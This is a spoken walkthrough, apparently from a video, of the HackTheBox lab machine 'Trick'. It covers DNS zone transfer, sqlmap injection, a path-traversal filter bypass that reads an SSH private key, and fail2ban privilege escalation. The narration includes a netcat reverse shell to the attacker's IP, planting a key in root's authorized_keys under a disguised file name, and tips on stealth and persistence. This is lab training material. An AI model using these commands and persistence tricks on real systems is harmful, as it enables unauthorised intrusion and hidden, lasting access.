What's good, YouTube? This is Dan Main, and today we are doing Trick from HackTheBox. So looking at this map, we have SSH open, we have SMTP open, we have 53 open, which is DNS, and then we have port 80 open, which is HTTP. Just a brief rundown of the protocols. Right now, I know of no exploits, because if there were any exploits for OpenSSH, everyone would know about them and it would be catastrophic, so not going to check there. SMTP, that's your mail protocol. You can get usernames from there through verify, and maybe you can get a server name or something like that. Not very often, especially in these boxes on HackTheBox, but it's worth checking from time to time. We also have DNS open, which will be key for this box, and we have port 80 open. So step one in the methodology, especially when you're messing with HackTheBox, is you want to locate a subdomain. Now, this doesn't apply in every box, but the majority of boxes. But before we jump there, I do want to bring your attention to this version number. Version numbers are very important when you're taking an OSCP. It's just as simple as doing a search exploit. So it's just search exploit and then Nginx 1.14.2. I spelled that incorrectly. Split. But as you see, there's no exploits, no shell codes. Even though I searched here, I would also search Google if I thought there was one, because sometimes search exploit isn't as updated as it should be. But just know that part. But again, being on HackTheBox, we are hunting subdomains. So the first thing that I'll do is visit port 80. So I'm going to open up a web browser, and I don't have this box activated. So I'm going to pause this video and actually activate the box. Okay, so our IP address is 10.129.95.128. I had to stop messing with the free server because I had a few issues dealing with this box, and I just had to be on a paid server for this video, just so things will go well. I mean, it looks like, okay, there it is. So we have our website is coming soon. Nothing here. You could try cross-site scripting or, you know, some stuff that relates to forms there, but we're hunting for subdomains, so we're going to ignore that. Looking in here, I've already read it, but you take the time to read this to make sure that there wasn't any hard links to a subdomain in there. And then you hover over these. I think my window's a little bit small, to see if you had anything there, maybe a username or something like that. We don't have anything, so this page is pretty much dead. So the next thing that we'll do is we'll go back to our command prompt and we're clear, and we'll say NS lookup, and then we'll server, which is 10.129.95.128. Sorry about that. Some notes from another box. 95.128. And then now we're connected to our machine. So it's the DNS server. So we'll just type this again, 95.128, and we have trick.htb. So we can just make sure we've exhausted everything by typing localhost. And so we don't have anything. So we'll just exit. I think that's the command. And then we'll say sudo sudo vim etc host. And then we're here. So I like Vim for the things that it could do. So I choose Vim over all of the other things. It's just me. We're just gonna say trick.htb for now, and then we're gonna wq bang that, and then we're gonna go back and we're gonna test out trick.htb. So where was I? I think I was there. Why did I open it up in 3? Organization is really important as well. As you see, I have my VPN on 4 so that I have 3 panels to deal with, and I usually like to keep my Firefox in 2. So that's what we'll do to organize things there. So yeah, HTTP, always type that, trick.htb, and we see it's the exact, we see that it's the exact same web page. So we want to continue to enumerate DNS. So we'll go back and we'll try dig, and wait a minute, we'll dig, and then any, and then at IP address, which is, my IP address went away. I had it saved. 10.129.95.128 there. And then we'll type the domain, which is trick.htb. And then we get trick.htb and root.trick.htb. So we could add that, root.trick.htb. This is all simple stuff for a lot of us, but we need to get in the habit of thinking this way, especially dealing with HackTheBox. So we have root.trick.htb. So we'll go back to that, and then we'll do that in a separate window to see if there's any differences in the page. HTTP, and then I don't really see any, so we'll keep enumerating to see if we can get anything else. So we'll try a zone transfer, which I'm looking up the syntax because it's not super intuitive to my mind. So that command would be dig axfr at 10.129.95.128, and the domain name, which is trick.htb, and we get pre-prod payroll trick.htb, which is another one. So we'll add that, paste on clipboard, and then I'm gonna go ahead and put this back on my clipboard, you know, just to save me some clicks there. And then I'm going to visit HTTP pre-prod payroll trick.htb, and we get a new page. So first thing that I like to do when I see a, what am I thinking here? First thing that I like to do when I see a username and password prompt is try admin, maybe roots, and we get nothing. We could check the source code to see if there are any additional subdomains. This is somewhat interesting because it is looks like JavaScript or something. I don't know. Maybe it's JavaScript, maybe it's not. I don't know. I see some hints toward potential LFI, but there's no extension, which is good on them. If you don't have an extension, typically that means that this links to an actual file sometimes. And so because you're using a keyword, you can't really enumerate, or that's how I understand it. I may be wrong on that, but it prevents people from enumerating via files, because at that point you'd have to know the keywords. And dealing with HTML and how Flask and all of these things work, you can actually just create one out of thin air, just with a few lines of code. So I don't think that that's LFI, but I do know, because I've done this box before, that there is a potential for LFI. So we'll just move on. From here, you want to attempt an SQL injection. So what we'll do for SQL injection to make it simple on ourselves is we'll activate Burp Suite, or while our Burp Suite proxy here, set by proxy, and then we will open up Burp Suite Community Edition, and then let that take some time to load. Start burp. And then we will Make sure intercept is on, and then just intercept that request. We'll go to save item, and then we'll save this as trick request. So once we've done that, we can turn off that. We can exit burp, and we can go back to number 1, which is our working area, and we can clear all of this because we got all of that information, and we just do SQL map. Wait a minute, where are we at? Trick. Yep. SQL map. And as you see, I have some of the, because I've already done the box, but ATT&CK level 3. We're pretending that we didn't do this box before, and we do a -- batch. And I think it's going to have my file already saved in there. Yep, it already kind of does. But it's going to take a little bit longer for you to run if you haven't done it before. But long story short, you're going to get these 3, which basically tells you that you have a vulnerability here, a vulnerability here, and a vulnerability here. And so from that standpoint, you can try file read etc pass wd, and then do you want confirmation? Sure. And you have it saved to your Kali in this location here, so you can just copy this, and then you just say cats etc pass wd, and you have etc pass wd. So you can see that Michael is a user on the box. So what makes sense to me is to see if I can read Michael's Michael's IDRSA. So I'm going to do home Michael SSH IDRSA, see if I can read that. No data retrieved. So apparently I'm not the I'm not Michael, and I can't really read that. There are other things to do. Hopefully I can get it right. I think it's users. So we have Remo at localhost. He's I guess that's a user for the SQL database. And then you can just do all, and I think it's gonna give you like all of the databases and the tables in there. It should give us some stuff. It's a lot, but I'm doing all of this kind of in vain. I did want to show you how SQL map worked, and to always do a level 3. But 2 things. One, SQL map is not allowed on the OSCP, or at the time of this video. Make sure you check to see what tools are legal or illegal, because they will get you an instant fail, or at least an instant fail on the box that you use it on. So just make sure you know those. And then the second thing is, I do know that this is a rabbit hole, even though you get like tons of information. As soon as I'm thinking that, let me go up for a minute. We're gonna get usernames and passwords if we didn't already. Let me see. We haven't gotten them yet. Nope, doesn't look like we have, but we're gonna get, there it is, I guess. We're gonna get usernames and passwords. We're gonna get administrator and then some password, if I'm not mistaken. But it is a rabbit hole, and rabbit hole training is very important, because you want to have good training where you're learning, maybe 65 to 75% of the time. You want to have good training where you're learning and where you're flowing and where things make sense. And then 35% of that training, 25 to 35, needs to be rabbit hole training where you're actually applauding and praising yourself for going down rabbit holes and enumerating and getting stuck. That needs to be a point, like a badge of honor to you, because you got to learn to stick and move, which I'm going to do a video on this, but you got to learn to stick and move to where, yes, SQL injection is enumerating a lot of stuff, but I don't want to fall in love with this vector, this attack vector, because it could very well be a rabbit hole. And especially when you get into the higher point boxes on the OSCP, I've been in situations a few times where I'll actually have a shell, or I have a, I'll be a user, maybe I'm www data, but I went in an unintended route and I stumble around and I find nothing and I have to back out and I have to go in another way. There was one particular box I did when I was training, and I'll stop this. There was one particular box I did when I was training where I actually had www data, but if I just had clicked into another console, I would have seen that the user's creds was there. So I didn't even have to take the www data route. So lessons learned there, just rabbit hole training, if you don't remember anything else from this section. But so we'll move on. So we didn't get anything from here, and we need to look at the situation here. So pre-prod payroll, because this is hyphenated, this should give us some kind of a hint that there may be more of these. So to see if our suspicions are correct or incorrect, we can say that is from a different box. I'm just gonna pull up my history. Let me see if I have it in here somewhere. Yep. Not that one though. So yeah, it's still in here. So we have wfuzz. We're gonna try wfuzz, and then save the file as subfighter. And this is the word list that we're gonna use. I recommend setlist. And then we're gonna do attack u, and then we're gonna say http trick.htb, attack uppercase h, and then we're gonna say host colon pre-prod fuzz.trick.htb, and we're gonna see how this looks. And if you notice, we have a bunch of 475s. So to filter that down to where we don't see so many 475s or any 475s, we want to type HW, ATT&CK HW 475. And then we're going to wait a minute. And we see that we got marketing back. So we can safely assume that marketing is another domain name. So what we'll do is go back to our Etsy host, and then we'll add pre-prod marketing.trick.htb. Now I know what you're thinking. It's not an easy pivot to back out of an SQL injection and continue to enumerate subdomains. So this isn't really, this is a challenging box. This isn't really, I wouldn't think like this for the OSCP, because the OSCP is more, even though it's tough, it's not meant to stump you in a way. So there will be a clear path in. You may have a rabbit hole on the harder boxes, but something like SQL injection, it's SQL map is not allowed for a reason, because you go down a rabbit hole like this and then you give up. So yeah, just know that because this is HackTheBox, you know, it expects you to go the distance and then consult the forums, so the forums get used. At least in my head, that's why so many rabbit holes exist. So back to the video. we'll try pre-prod. You probably seen it earlier when I was enumerating stuff, but pre-prod marketing trick.acb, and we get this beautiful page here. We always want to check page source to see what's going on here, and we see we may potentially have some LFI there. So we'll go back. How did I get out of that? Okay, so we'll go back and we see that, yep, LFI. If you don't know what LFI is, or you have never seen it before, get a good look at what's going on here and be familiar with it. Lock this in. When you see page or F or file equals something dot extension, you can safely assume that you have an LFI opportunity. Now, I just did a box, and I'll tell you that this is not 100% the case, because defenders typically put filters so that you can't do that, or they may replace this with a keyword or whatever the case to defend against it. So again, this goes back to our rabbit hole training. When you see this, go ahead and attempt to enumerate with your LFI techniques. But if nothing happens, if it's been 10 minutes and you run through everything you know, just stick and move. Be willing to move to another vector. So the first thing that I like to do is // and do 10 of those just to be safe, just to make sure, because this directory may be, I don't know, 5 directories deep, 3 directories deep. So I know that it's good practice to not put a directory more than 3. Well, if it's being served, like being 10 directories deep is bad knowledge management. So I know with 10 // that I should get SC pass WD, but we don't get anything. So what this tells me is these may be filtered, and when it actually reports to the web server, it just strips all of these. So we need to, the next way that we need to think is, well, how do we defeat their filters? And we can do this, or at least attempt to defeat them. And we could do this by going back to our, we're going to use we're going to use FUF this time, actually. And then here it is. So essentially what we're doing here is the same thing that we did with the same concept that we did with wfuzz. And we're using ..pawn. So going a little bit fast here, let's go to our research, which is 3. We like to put our research in the 3 screen. So not payroll, payload, all the things. When I come up with a payload, or when I come up with, cross-site scripting, things like that, like those payloads like that, and I tried and it doesn't work, I can't just say, oh, well, I tried cross-site scripting with this certain payload, it didn't work, it must not be cross-site scripting. They don't never think like that, because you will fail. Instead, you have several payloads here that may help you. So we know we have LFI, but we're trying to, and this may get confusing. So if you have LFI, which I think LFI is here somewhere, file inclusion. So we have local file inclusion. Just understand that you have LFI to RCE, and things like that, which let me slow down for a minute. LFI can potentially make changes to files on your system, but we don't want to do that first. We want to see if we can traverse directories first, and then if not, we can go down that path to see if we could modify files. So with all that said, I want a directory traversal payload list first when I'm doing LFI, and that's where this .pawn comes from. And if you want to just see how that looks, you have all of these payloads. So That's what I'm using. So I already have .pawn in, not in there. I have it in an op folder, CD, my own op folder actually. And what I did with my op folder is I ran out of space on my Kali, and so I installed a Kali. Well, I installed another drive. Back to what's going on here. You see, yeah, you don't want no part of this, right? So if we look at the majority of results, we have lines 1 and words 1. So let's filter that out to see if we can get better results. So we could say FW1, and it's frustrating, I know, because this would be --FW1 and wfuzz. So I mean, it's just all in taking good notes and making sure you know what you're doing. But here we have several payloads that we believe may have worked because it's different. We have different words there. We have different lines and such. So let's try, we don't care about issue, actually. We care about SC pass WD. Let's try this payload first. So we will try that and we get a result. So we get SC pass WD just like we did with the SQL injection. So we have successful we can read things. So what we could do is we could say home Michael SSH ID RSA, and we get his private key. We don't want to copy and paste this private key out of here. I dealt with a few guys that attempted to, they're copy and pasters, which it makes sense in some instances to copy and paste, but when you have symbols and when you have special stuff, always attempt to get it first. So we'll go back into our working direct or CD HTTP trick, and then we'll say wget all of this. So wget, and this is the web page that we were just on, same thing, and then tag big O, remember big O, not little o, and then trick ID RSA. We'll save that, and now anytime you get a ID RSA, you want to chmod it first. Chmod 600 trick.id.rsa. Otherwise, it's just gonna get mad at you and say, hey, your permissions are not right. Once we do that, now we can log in as Michael, and then we'll say -i and then trick.id.rsa, and then we're Michael. So we could cat user.text, and then so there's our flag. Moving on, now we have to kind of see what's going on the box. That's Lisa. Nothing much. What else? Let's try PS health. Let's see what's going on here. Postfix, nothing interesting there. We'll just look around still. Nothing. So let's try sudo tag L, which should be in kind of like your wheelhouse of first things to do. And we see that we have root access to fail to ban. So if we look up some information on fail to ban, we'll see that fail to ban runs commands upon a banning action. Like if it bans an IP, it can run a linux command, and we're gonna see if we can exploit that. The file that we'll be going after is iptables multiport.conf. Now, if we didn't know this, we would go to our number 3 panel there, and then we'll just say fail to ban configuration files, and we'll just have to look around and look around and see how to set it up. We can see how to apply the regex. I can tell you without help and without the forums, that this would have been a challenge even for me. But I mean, using the forums, I'm a big advocate of using whatever you have at your fingertips. Let's see, fail to ban actions. Did we just go to that? Yep. I think this is the one that I read. SSH enabled. We have, but yeah, it take you a while if you didn't know anything about fail to ban and you were trying not to use the let's try server action module, and you were trying not to use the forums. It would take you a while to learn to understand what was going on. So you can check there, or you can go the .conf route. You'd start looking at the .confs to see what you could do. ipdb.conf. Wow, why did it do that? Okay, so the important thing, and it's already taken effect on my video, is these files wipe themselves every 3 minutes, which is one of those HackTheBox isms that we have to get over. So just, if video looks weird, that's the reason. Abuse.conf, and then we'll see we have commands here. And so in my head, this tells me that when things happen, like when things get banned or whatever the case, I can just put my own little command there to do some nefarious activities. But when I was researching some stuff, when I was researching some stuff, the file that I was more fond of was iptables multiport.conf file. And I think you can use any of these conf files because they all have an action ban place, and once you get something to ban, it'll just run that command. So what we want to do is, first we want to make sure, and this is one of those unintuitive things, because we have to, again, I think the creator of the box needed to wipe the file so that if we messed up or if we did something crazy or if we banned ourselves, we get another chance after 3 minutes. Let's see, Lisa. So 1709. So it's going to wipe itself in about 1 minute. So we need to get IP tables. No, what is it? IP tables, not that. IP tables multi. Okay, it must be gone. No, it's not. IP tables multi. Okay, copy IP to home slash. That should be fine there. Okay, so it's not there again. As you see, it's 1112 and it wiped itself. So typically have to go out of there and go back. So immediate action, and then IP tables .multiport.local. Another unintuitive thing that I didn't know until I did this box is you want to make sure that you change the extension so that you don't overwrite your .conf file. So when this program runs, it's going to run the .local and not the .conf. Go figure, right? So back here, we want to vim into our IP tables, keeping an eye on the clock, knowing that it's going to reset again at 11:15. So we want to race against the clock here. Once I port .local, and then we want to aim for this action start. So what we can do first, so that we don't jump the gun, DD here, and then go up, check I, and then we just click the delete button here. We want to say ping .c1. Actually, I think ping will actually work. 10, 10, 14, 26. WQ bang. And then we want to open up a separate terminal, and we'll rename this TCP dump, just so we can stay organized. Do sudo TCP dump I ton 0 ICMP. And then I'm going to pause the video and wait until 11:15 to set up my exploit. All right. It should be very close to 11:15, so I'll go ahead and set up my copy command so that I can run it as soon as IP tables local, and that should be etc fail to ban action D, and then I'm gonna wait it out until 11:15 because again it's gonna wipe all of those files and then reset them. So yep, 11:15. So that's there, and then we'll just check to make sure that it made it to ban action D IP tables. There it is, it's here. So the next thing that we need to do very quickly, because we run out of time, sudo tech l, what is that, sudo etc net d. I probably should have had this restart, and we start there, and then we need to make a new tab, ssh micro.trick.hdb. And then we actually probably need to so now we're banned, we're just making sure Michael gets banned. We'll just do this a few times. Uh-oh, that's the wrong thing. I'm tripping. Has it got banned yet? Yep. So we got banned. We have command execution here. So it was 15. So we have to set up our exploit again to run at 18. So what we'll do is, here is it's a little bit tricky, but I'll show you exactly what I'm doing here. First thing, so some people may say, well, you can go ahead and get a reverse shell, you know, etc., and things like that. In a lot of cases, if you can get something stronger and more persistent, that's what you'll have to do. I'm gonna miss the 18 here because I'm jaw jacking here, but with that said, the first thing that I want to do is go clear, and then SSH keygen. I'm not gonna run this command, but this, because I already have one. Actually, it doesn't matter. Let's do another one. Actually overwrite and do empty passphrase and all of that. So once I generated that, that should be in ls in IDRSA.pub. So this is my public key, and I need my public key to be on the victim box, so that I could just log in as root. And also keeping in mind that fail to ban is running as root via sudo, well, not via sudo, because fail to ban runs as root. So keeping all those things in mind, what we want to do is go to cd SSH, make sure we're there, and then we'll do a python m http server. I just like to run it on 80. And then to go back here, we will say wget http 1010, keeping an eye on the time. I'm going to try to run it at 21 if I'm quick enough with the command. 10.10.14.26 / IDRSA.pub. Let's just make sure that that's the correct spelling. IDRSA.pub. It is. And then we're going to do a big O here. Temp dot, let's make it obscure, like VMware 0948. And then we will say and cat tmp VMware 9478 into root SSH authorized keys. So just explaining what we're doing here, I'm taking my IDRSA.pub and then saving it as something obscure so that you know it doesn't look like, man, I just got hacked. And then I'm going to cat my public key that's newly placed on the box into authorized keys, and I'm going to append it. I'm not going to overwrite it. That way it's very OPSEC friendly and very stealthy, or as stealthy as I could be. So with that said, all of that's running, all of that is good. We're going to see if this works. So yeah, so we want to copy our file to ActionD again, and then we're going to wait for 11:21 so we'll pause it. It is now 11:21, so we're going to sudo fail to ban restart. So as we restarted the service, we could close that. Actually, we shouldn't have closed that. SSH micro.trick.hdb, and just want to spam this. Trust me, I know some people are gonna say, why didn't you script that? I tried, I did Hydra and all of that, and it just, this is the most stable way to go. So at some point I should get a yep, still haven't got it yet. Oh, don't do that. Yep, see, because this Privilege is like ridiculous. Oh, so I just got banned and nothing happened. So I'm going to have to do that again. So let's see what I did wrong here. So let me try netcat 10 10 14 26 443 e and bash and then I need to copy that over, and then I need to wait until 11:30. So right before that, what I'll do is I will set up a netcat listener lvmp 443 and then sudo that and listen on 443. And then I actually want to have a separate window so that I could see when it, actually I could just divide it up vertically. SSH, let's just go ahead and get that ready. So it's 11:30. So now I can try again. Sudo restart and start spamming once again. That's a process, man. You could just do this. And this should work now. There we go. Who am I? Root, and then just do cat root.text. So the reason why I don't prefer this method here is because I think that reverse shell drops. So I was going with Vim. Let's go with Vim IP tables. I was going with this method. Now that I know what I did wrong, we can actually do it. wget http 10 10 14 26, and then plus this is the most obsec friendly method. ID rsid.pub id/rsa.pub, and we can save it as temp VMware and then random numbers, and then we could say and cat temp VMware 9552 into author roots SSH authorized keys, and then we can reopen our Python server. So it's 33, so we'll try this again. We'll just make sure that it makes it, and then we'll just make sure that it's there. It is. And then at 36 we will do this again. So yep, that's 36. So we'll restart. Let's restart. Where's sudo restart? Just making sure that it's still there. Oh, okay. So when you restart, it also deletes. Yikes. Okay, so that's what I was messing up on. Now it's there. Then it's I'm not serving on like any weirdness here. I just really want this to work. No. There we go. Finally. Thank you. So it finally works now. And so now I could just say SSH root at trick.htb. Boom. So now I have an actual SSH shell, and I don't have to like worry about any trickery or anything like that. I can close that. Let me see. Collapse subterminal. And then I could just like cat etc shadow, anything like that. cat what is it, cat root.text, and then I'm good. I have a stable shell and it's more OPSEC friendly. I didn't delete, let me go back. I didn't delete my VMware 9552. But it would have been OPSEC friendly to go ahead and delete that as well. As you see, it kind of blends in with the rest of this stuff, and that's what I was going for. You see VMware 9552 blends in with that, and so it's just another thing that you can add to your, I guess, your arsenal, so that you're more stealthy when you do your pen test. So that's pretty much it. I think from here I would just go ahead and remove VMware 9552 and then cd, probably create a user or something depending on how things were going with the local defenders I was up against, the things that they watched and things that they didn't. And then my authorized keys, as you see, this is my public key here. I'd go ahead and delete that out and then try to get root's password so that I can get in. Well, I wouldn't do it in that order. I would definitely go for root's password first, delete this out, and then I'd have more persistent access to the box. So plus probably 7 other ways to persist in the event that root password got changed. I hope you enjoyed my struggling. Please like and subscribe and comment if you got any questions on how I could have done things better. This is Dan Main, and we out.